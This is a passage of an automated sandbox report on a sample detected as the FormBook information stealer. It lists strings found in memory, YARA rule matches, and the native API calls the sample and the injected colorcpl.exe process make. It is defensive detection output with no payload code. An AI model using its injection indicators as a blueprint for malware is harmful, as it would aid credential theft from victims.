Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: UOMp9cDcqZ.exe, 00000001.00000003.233796502.0000000005B09000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersU
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comm
Source: UOMp9cDcqZ.exe, 00000001.00000002.252895146.0000000005B00000.00000004.00000001.sdmp; String found in binary or memory: http://www.fontbureau.comuev
Source: UOMp9cDcqZ.exe, 00000001.00000003.228190439.0000000005B1B000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.c
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn.
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/
Source: UOMp9cDcqZ.exe, 00000001.00000003.229871237.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/MI
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UOMp9cDcqZ.exe, 00000001.00000003.230147974.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/&
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/4
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/liquI
Source: UOMp9cDcqZ.exe, 00000001.00000003.231535629.0000000005B04000.00000004.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/z
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp, UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.coma-d
Source: UOMp9cDcqZ.exe, 00000001.00000003.228060907.0000000005B1D000.00000004.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.coms
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: UOMp9cDcqZ.exe, 00000001.00000003.229096064.0000000005B06000.00000004.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.krN.TTFv
Source: explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: UOMp9cDcqZ.exe, 00000001.00000003.228445833.0000000005B1B000.00000004.00000001.sdmp; String found in binary or memory: http://www.tiro.comn
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: UOMp9cDcqZ.exe, 00000001.00000002.254990999.0000000006D12000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.279849164.000000000BC30000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp; String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Malicious sample detected (through community Yara rule)
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_004182AC NtReadFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041838B NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E95D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E98F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E97A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013EAD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9560 NtWriteFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E95F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E99D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013EB040 NtSuspendThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E98A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013EA710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013EA770 NtOpenThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9760 NtOpenProcess,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013EA3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9A10 NtQuerySection,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E9A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_013E96D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047395D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047396E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047396D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047399A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739560 NtWriteFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0473AD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047395F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0473A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0473A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047397A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0473B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047398F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047398A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_047399D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_04739B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0473A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02558260 NtReadFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_025582E0 NtClose,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_02558390 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_025581B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_025582AC NtReadFile,
            Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 15_2_0255838B NtAllocateVirtualMemory,

            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_006EA90E
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_006E63D1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_02B0C2B0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_02B09970
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B77A60
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7AD18
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7BF50
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7B588
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7E850
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7BA38
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7BA28
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B77A51
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7DC68
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7AC5F
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7EEF0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7AFB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7AFC0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7BF42
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7A0F9
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B70006
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B70040
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7A108
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7F148
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7F3D8
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B774B0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B774A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_08B7B578
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E618872
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E61A830
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E618668
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E613678
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E618678
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E61365D
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E615AE0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E615AD2
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E6182A0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 1_2_0E618290
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00401030
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B8B1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B963
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00408C4B
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00408C50
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B493
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041B496
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041C539
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00402D89
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00402D90
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041CE85
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041BF12
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0041C795
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe | Code function: 2_2_0086A90E
